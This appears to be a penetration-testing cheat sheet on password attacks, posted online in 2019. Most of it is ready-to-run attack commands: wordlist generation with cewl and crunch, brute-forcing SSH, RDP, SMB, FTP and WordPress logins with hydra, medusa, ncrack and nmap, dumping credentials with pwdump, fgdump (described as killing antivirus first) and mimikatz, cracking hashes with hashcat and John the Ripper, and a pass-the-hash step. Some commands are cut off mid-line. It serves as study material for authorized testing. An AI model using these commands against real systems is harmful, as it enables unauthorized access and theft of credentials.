Title: Password Attacks techniques used and required in Penetration TestingAuthor: unknowndevice64

AES Decryption

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \

Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict

Default Usernames and Passwords


Government Security - Default Logins and Passwords for Networked Devices



Default Password

Brute Force

Nmap Brute forcing Scripts

Nmap Generic auto detect brute force attack: nmap --script brute -Pn <target.com or ip>

MySQL nmap brute force attack: nmap --script=mysql-brute $ip

Dictionary Files
Word lists on Kali
cd /usr/share/wordlists

Key-space Brute Force

crunch 6 6 0123456789ABCDEF -o crunch1.txt

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

crunch 8 8 -t ,@@^^%%%

Pwdump and Fgdump - Security Accounts Manager (SAM)

pwdump.exe - attempts to extract password hashes

fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.

Windows Credential Editor (WCE)
allows one to perform several attacks to obtain clear text passwords and hashes. Usage: wce -w

extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access):

meterpreter> load mimikatz
meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPasswords

Password Profiling
cewl can generate a password list from a web page
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt

Password Mutating
John the ripper can mutate password lists
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

Medusa, initiated against an htaccess protected web directory
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10

ncrack (from the makers of nmap) can brute force RDP
ncrack -vv --user offsec -P password-file.txt rdp://$ip


Hydra brute force against SNMP

hydra -P password-file.txt -v $ip snmp

Hydra FTP known user and rockyou password list

hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp

Hydra SSH using list of users and passwords

hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

Hydra SSH using a known password and a username list

hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh

Hydra SSH Against Known username on port 22

hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V

Hydra SMTP Brute Force

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Hydra attack http get 401 login with a dictionary

hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

Hydra attack Windows Remote Desktop with rockyou

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

Hydra brute force SMB user with rockyou:

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

Hydra brute force a Wordpress admin login

hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Password Hash Attacks

Online Password Cracking
https://crackstation.net/ http://finder.insidepro.com/

Hashcat Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.

apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev


apt-get install pocl-opencl-icd

Cracking Linux Hashes - /etc/shadow file

500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems

Cracking Windows Hashes

3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems

Cracking Common Application Hashes

900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash

Create a .hash file with all the hashes you want to crack puthasheshere.hash: $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/

Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:

hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt

Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/

Wordpress clear text: test

Hashcat example cracking Wordpress passwords using rockyou:

hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt

Sample Hashes

Identify Hashes


To crack linux hashes you must first unshadow them:

unshadow passwd-file.txt shadow-file.txt

unshadow passwd-file.txt shadow-file.txt > unshadowed.txt

John the Ripper - Password Hash Cracking

john $ip.pwdump

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

john --rules --wordlist=/usr/share/wordlists/rockyou.txt

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

JTR forced descrypt cracking with wordlist

john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt

JTR forced descrypt brute force cracking

john --format=descrypt hash --show

Passing the Hash in Windows

Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:

export SMBHASH=aad3


pth-winexe -U administrator //$ip cmd

Submitted On: 2019-05-18 12:27:03